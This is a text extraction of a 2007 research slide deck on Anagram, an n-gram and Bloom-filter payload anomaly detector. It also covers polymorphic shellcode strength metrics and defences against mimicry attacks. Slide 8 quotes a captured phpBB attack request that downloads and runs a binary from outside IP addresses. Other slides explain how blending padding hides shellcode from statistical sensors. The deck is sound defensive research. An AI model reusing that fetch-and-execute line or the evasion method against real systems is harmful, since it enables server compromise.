Title: Contentbased Anomaly Detection
1Content-based Anomaly Detection
- Salvatore J. Stolfo
- Columbia University
- Department of Computer Science
- IDS Lab
December 2007
2Colaborators
- Gabriela Cretu
- Angelos Keromytis
- Mike Locasto
- Janak Parekh
- Angelos Stavrou
- Yingbo Song
- Ke Wang
3Agenda
- Anagram payload anomaly detection algorithm (Post
Payl) - The Polymorphic Threat
- Countering Adversarial training/mimicry attacks
- Randomized modeling/testing
4Conjecture and Goal
- Detect Zero-Day Exploits via Content Analysis
- Worms propagation detectable via flow
statistics (except perhaps slow worms) - Targeted Attacks (sophisticated, stealthy, no
loud and obvious propagation/behavior) - True Zero-day will manifest as never before seen
data - Learn typical/normal data, detect abnormal data
- Desiderata Accuracy, efficiency, scale,
- counter-evasion (resist training and
mimicry attack) - Minimize false negatives
- Minimize resource consumption too (Think MANETS)
5Goal
- We seek to model normal payload
- Ingress from external sources to servers
- Egress from servers to external sources
- Egress from clients within a LAN
- We model content flows that are cleartext
- Learn typical/normal data to detect abnormal
data need not be perfect - Whitelisted data deemed normal passes
- Blacklisted data filtered
- Suspicious data deemed abnormal, subjected to
deeper analysis, eg., emulation - Overall Goal for system
- Dont negatively impact operations
- maintain throughput, minimize latency, minimize
cost
6(No Transcript)
7Previous work PAYL
- Models length conditioned character frequency
distribution (1-gram) of normal traffic - Testing Mahalanobis distance of the test packet
against the model - Pro
- Simple, fast, memory efficient
- Con
- Cannot capture attacks displaying normal byte
distribution - Easily fooled by mimicry attacks with proper
padding
8Example phpBB forum attack
GET /modules/Forums/admin/admin_styles.php?phpbb_r
oot_pathhttp//81.174.26.111/cmd.gif?cmdcd20/t
mpwget20216.15.209.4/crimanchmod2074420criman
./crimanecho20YYYecho..HTTP/1.1.Host.128.59.
16.26.User-Agent.Mozilla/4.0.(compatible.MSIE.6.
0.Windows.NT.5.1)..
- Relatively normal byte distribution, so PAYL
misses it - What we need capture order dependence of byte
sequences - PAYL Frequency-based modeling of n-grams (ngt1) is
infeasible here since feature space is huge
requiring long training time - Anagram higher order n-grams (ngt1) modeling is
possible
9Why n-grams?
- Easily extracted feature from packet payload
flows - Language/protocol independent
10Overview of Anagram
- Binary-base high order n-gram modeling
- Store all the distinct n-grams appearing in the
normal training data - During test, compute the percentage of never-seen
distinct n-grams out of the total n-grams in a
packet - Semi-supervised
- Normal traffic is modeled
- Prior known malicious traffic is modeled Snort
Rules, captured malcode - Model is space-efficient by using Bloom filters
with gzip - Normal 7-gram BF 16 MB -gt 1.2MB after gzip
- Malicious mixed 2-9-gram BF 8 MB -gt 0.8MB
after gzip - Accurate anomalous payload detection, even
carefully crafted attacks/mimicry attacks - Fast correlation of multiple alerts while
preserving privacy by using Bloom filter
representation of anomalous payload - Generate robust attack signatures
11Bloom filter
- A Bloom filter (BF) is a one-way data structure
that supports insert and verify operations, yet
is fast and space-efficient - Represented as a bit vector bit b is set if
hi(e) b, where hi is a hash function and e is
the element in question - No false negatives, although false positives are
possible in a saturated BF via hash collisions
use multiple hash functions for robustness - Each n-gram is a candidate element to be inserted
or verified in the BF - Bloom filters are also privacy-preserving, since
n-grams cannot be extracted from the resulting
bit vector - Exhaustive dictionary attack may reveal grams
- Frequency of grams not available, reconstruction
very hard
12(No Transcript)
13Overview of Anagram(Training BF models)
14Overview of Anagram(Detection BF represents
anomalous packet data)
15False positive rate (with 100 detection rate)
with different training time and n of n-grams
Normal traffic real web traffic collected of two
CUCS web servers Test worms CR, CRII, WebDAV,
Mirela, phpBB forum attack, nsiislog.dll buffer
overflow(MS03-022)
- Low False positive rate PER PACKET (better per
flow) - No significant gain after 4 days training
- Higher order n-grams needs longer training time
to build good model - 3-grams are not long enough to distinguish
malicious byte sequences from normal ones
16Anagram semi-supervised learning
- Binary-based approach is simple and efficient,
but too sensitive to noisy data - Avoid high entropy fields
- Pre-compute a bad content model to discriminate
using snort rules and collection of worm samples. - This model should match few normal packets,
while able to identify malicious traffic (often,
new exploits reuse portions of old exploits) - The model contains the distinct n-grams appearing
in malcode collections not also in normal traffic - Use a small, clean dataset to exclude the normal
n-grams appearing in the snort rules and virus.
17Use of bad content model
- Training ignore possible malicious n-grams
- Packets with a max number of N-grams matching the
bad content model are ignored - Packets with high matching score (gt5) ignored,
since new attacks might reuse old exploit code. - Ignoring few packets is harmless for training
- Testing scoring separates malicious from normal
- If a never-seen n-gram also appears in the bad
content model, give a higher weight factor t for
it. (t5 in our experiment
18The false positive rate (with 100 detection
rate) for different n-grams, under both normal
and semi-supervised training per packet rate
19Yesterdays Newsliterally!
20Can we get ahead of the enemy?
- Polymorphism complicates everything and
challenges assumptions - So, how well do current engines do?
- Metrics to evaluate
- Spectral imaging to visualize
- Can we pre-compute malcode before the enemy and
pre-model these yet to be seen in the wild? - GA Search to generate decoders
21Analysis of the Polymorphic Threat
- Goals
- Analyze the effectiveness of current polymorphism
techniques employed by Shellcoders to evade
signature-based IDS - Develop metrics to quantify the strength of
modern polymorphic engines and use it to analyze
existing engines being used in the wild - Explore the threat for combining polymorphism
with other evasion techniques such as blending
attacks - Explore future theoretical limits for shellcode
polymorphism
22Why use Polymorphism?
- Easy to use obfuscation technique to complicate
detection - Basic Shellcode form NOPPAYLOADRETADDR
- Basic cipher based polymorphism
- 1 Cipher/encode payload
- 2 Prepend a decoder in front.
- 3 The shellcode will de-crypt itself as it
executes! - Now only the decoder needs to be polymorphic.
- Polymorphic Shellcode
NOPDECODERCIPHER_TEXTRETADDR
23Polymorphic Shellcode
- Sample decoder from the open source CLET engine.
- Only 35 bytes are needed to generate five layers
of cipher operations.
How can we measure the effectiveness of these
polymorphic techniques? Modeling encrypted
portion is impossible. Need a metric to measure
decoder variants.
24Strength Metrics for Polymorphism
- Variation strength estimates the spread over
n-space - (average of the square root of the covariance
matrix eigenvalues that span the generated space
of decoders)
- Propagation strength estimates how different
each decoder appears - (measures the expected distance between any two
decoders) - Overall strength is the product of the two
metrics. Some engines generate many decoders by
shifting the order of operations. In this case,
variation strength might be high but the
propagation strength would be low.
25Strength Metrics
- To evaluate the strength of a polymorphic
engine we take a shellcode sample and use it to
generate 50,000 decoders. Extract the
decoders and then use the metrics we presented.
Decoder polymorphism strengths for various
engines using our metric. We are also presenting
the scores for random strings with range 128 and
range 256
26Strength Metrics
- Another innovation spectral images.
- Generate decoder samples, stack them together
and display the stacked samples as an image. The
invariants appears as stripes.
27Exemplar Polymorphic Blending Engine
Combine CLET, ADMmutate, add our own blending
engine. Clet ciphers the shellcode. Leaves a
blending section open, execution doesnt reach
there.
- ADMmutate hides CLETs NOP sled
- Decoder and exploit section is randomized
- Return address section is obfuscated with a
blending aimed to some target distribution
Each row of pixels represents a fully working
shellcode nopdecodercipher-textopen-blend
retaddr
28Polymorphic Blending Potential
- The blending section sits outside the
shellcodes inner loop and is never reached
during execution. Attackers can fill this area
with bytes sampled from the same distribution as
the target network to bypass statistical IDS
sensors. - The byte distribution of a sample target
network. - Mahalanobis distance of the shellcode byte
distribution to the target distribution as we
enlarge the blending section.
29Is N-space Saturated?
- Theoretical Limits Of Polymorphism?
- GA-search shows N-space Is Likely Saturated With
X86 Code That Behaves Like Polymorphic
Decoders. - Magnitude Of Decoders , N Is The
Length Of The Decoder(30 Bytes). Number Of
Atoms In The Universe Is Only .
30Conclusion on Polymorphism
- The metrics provide a means to quantify the
strength of polymorphic engines relative to each
other - Very sophisticated polymorphism techniques are
already implemented and are a real threat - Experimental results show that there is virtually
no limit to the ways decoders can be written - Signature based methods arent likely to work in
the long term - The only hope?
- Either instrument ALL systems with dynamic
host-based tests - Or counter these evasion techniques with better
content AD sensor - We do not yet know whether another modelling
technique can effectively discriminate well
enough between malicious or benign content
31Counter Evasion
- Blind the attacker from critical information
using randomization techniques - We assume they know the algorithm and perhaps can
know an estimate of the target distribution from
some period of time, but they may not know the
actual model used by a content AD sensor! - The enemy needs to know
- Where to pad
- Hide the packet locations where models are tested
- What to pad
- Hide the normal distribution
- Length-conditioned model
- Eg., Multiple Bloom filters per model
- Hide the gram size
- Random choice of n
- When to pad
- Re-compute models on a random schedule
- Eg., Time-bounded Bloom filter models
32Randomization against mimicry attacks
- The general idea of payload-based mimicry attacks
is by crafting small pieces of exploit code with
a large amount of normal padding to make the
whole packet look normal wrt some particular
model - If we randomly choose the payload portion for
modeling/testing, the attacker would not know
precisely which byte positions it may have to pad
to appear normal harder to hide the exploit
code! - This is a general technique can be used for both
PAYL and Anagram, or any other payload anomaly
detector. - For Anagram, additional randomization, keep
n-gram size a secret!
33Randomized Modeling (1)
- Separate the whole packet/session randomly into
several (possibly interleaved) substrings or
subsequences S1, S2, ..SN, and build one model
for each of these randomly chosen portions - Test payload is divided accordingly
34Randomization techniques (2)
- Randomized Testing Simpler strategy that does
not incur substantial overhead - Build one model for whole packet, randomize
tested portions - Separate the whole packet randomly into several
(possibly interleaved) partitions S1, S2, ..SN, - Score each randomly chosen partition separately
35(No Transcript)
36Randomization techniques (3)
- Fine grained modeling of normal payload
- Condition models on packet length or randomly
chosen packet portions - Could incur large memory costs
- Cluster adjacent models to reduce space for
detector
37Example of clustering models
38Feedback-based learning with shadow servers
(correlation with server responses)
- Training attacks attacker sends malicious data
during training time to poison the model. - Bad content model cannot guarantee 100 detection
- The most reliable way is using the feedback of
some host-based shadow server to supervise the
training - Also useful for adaptive learning to accommodate
concept shifting - Anagram can be used as a first-line classifier to
amortize the expensive cost of the shadow server - Only small percentage of the all traffic is sent
to shadow server, instead of all - The feedback of shadow server can be improve the
accuracy of Anagram
39(No Transcript)
40Minimize Latency
False Positive Rate is not the only
metric Sensor speed crucial for all
traffic Accuracy impacts latency Protected
system with shadow incurs latency True
Positives are filtered No latency for True
Negatives Some latency for False Positives L
operational latency per request O shadow
server overhead (eg., 20) F false positive
rate of sensor L ((1-F)L) (LOF) Target L
L at 1, if O20, F can be as high as 10
41Thank you!
42With huge feature space of high order n-grams,
when is the model well trained? How likely we
will see new normal n-grams?
The likelihood of seeing new n-grams, which is
the percentage of the new distinct n-grams out of
every 10,000 packets when we train up to 500
hours of traffic data
43Distribution of bad content matching scores for
normal packets (left) and attack packets
(right). The matching score is the percentage
of the n-grams of a packet that match the bad
content model
44Cross-site collaboration Content alert sharing
- Principles
- Each site has a distinct content flow
- Diversity via content (not system or software)
- Higher standard to confound mimicry attack
- Exploit writers/attackers have to learn the
distinct content traffic patterns of many
different sites - If multiple sites see the same/similar content
alerts, its highly likely to be a true
worm/targeted outbreak - Each site corroborates its evidence
- Reduces false positives by creating white lists
of those alerts that cannot be correlated
45Anagram privacy preserving cross-site
collaboration
- The anomalous n-grams of suspicious payload are
stored in a Bloom filter, and exchanged among
sites - By checking the n-grams of local alerts against
the Bloom filter alert, its easy to tell how
similar the alerts are to each other - The common malicious n-grams can be used for
general signature generation, even for
polymorphic worms - Privacy preserving with no loss of accuracy
46Counter Evasion Collaborative Sharing of
Suspicious Content (DNAD-2/AEOLOS) PI Sal Stolfo
Columbia University Tel. (212) 939-7080, E-Mail
sal_at_cs.columbia.edu
- Objective
- Validate suspect anomalous content detected
locally - as a true new attack exploit
- - Identify anomalous content indicative of
attack, or botnet - command and control or malware embedded in
docs - - Resist Mimicry and Training Attacks
- - Cross site validation to detect True
Positives - - Preserve privacy of shared data among sites
- Contract Army Research Office, No. DA
W911NF-04-1-0442 - Budget FY05-07 NSA MIPR/ARO 420K
Continuous, semi-supervised learning of new
attack exploits cross site validation
- Accomplishments
- Developed the new Anagram sensor shown to resist
- mimicry attack
- Developed new quantifiable, privacy preservation
- techniques for cross-domain sharing
- l Collaborating with NSA and other organizations
to test - Challenges
- l Cross-site collaborators and managing privacy
policies - Develop interchange and interfaces for content
- submission
- Scientific/Technical Approach
- Anagram anomaly detector based upon randomized
- models countering mimicry attacks
- l Use privacy-preserving one-way Bloom filter
data - structure to share anomalous content among
sites and - correlate to filter out false positives
- l Robust signatures extracted from Bloom filters
47DNAD
- Goal develop a new paradigm for intrusion alert
information sharing while maintaining compliance
with information disclosure restrictions and
privacy policies - Support rich, varied types of intrusion alerts
and models/profiles of behavior - Critical to get accurate global view on threats
rapidly to enable defense mechanisms - IRB/legal roadblocks prevented wide scale
deployment
48DNAD corroboration model
- Transmit privacy-preserving transforms of IDS
alerts, extend beyond headers to network traffic
payloads and other models - Build a robust, temporal-enabled corroboration
infrastructure able to match alerts (and
fragments of alerts) across sites - Use of compact Bloom filters and n-gram analysis
for fast, robust encoding - Automatic suspect signature generation
49A graphical viewthink P2P
50What if we exchange models too?
Models
51Training data sanitization
- Motivation
- Focus on zero-day attacks, but
- Anomaly detection performance can be improved by
using clean training data - Attacks appearing in training data can
deteriorate detection performance - False positives create excessive noise
- Method
- Use a large set of (distributed and diverse)
training data of network packet payloads from
multiple domains - Divide data into multiple blocks
- Build models for each block and exchange models
(privacy-preservation) - Test all models against a local smaller dataset
- Voting algorithms( bagging predictors ) to
determine false false positives and true
positives - Clean data based on previous step